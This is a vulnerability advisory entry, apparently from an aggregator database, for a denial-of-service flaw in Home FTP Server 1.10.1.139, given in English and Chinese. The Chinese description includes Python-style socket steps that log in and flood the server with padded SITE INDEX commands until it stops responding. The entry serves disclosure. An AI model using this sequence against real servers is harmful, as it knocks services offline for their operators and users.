Vulnerability Information
Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.
Vulnerability Title
N/A
Vulnerability Description
Home FTP Server 1.10.1.139 allows remote attackers to cause a denial of service (daemon outage) via multiple invalid SITE INDEX commands.
CVSS Information
N/A
Vulnerability Type
N/A
Vulnerability Title
Home FTP Server SITE INDEX命令拒绝服务漏洞
Vulnerability Description
Home Ftp Server是一款简单易用的FTP服务器。 当用户登录到Home FTP Server后,执行以下步骤就会导致服务器停止响应: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.for i in range(1,20): sock.send("SITE INDEX "+ "a"*30*i +"\r\n") 5.sock.close
CVSS Information
N/A
Vulnerability Type
N/A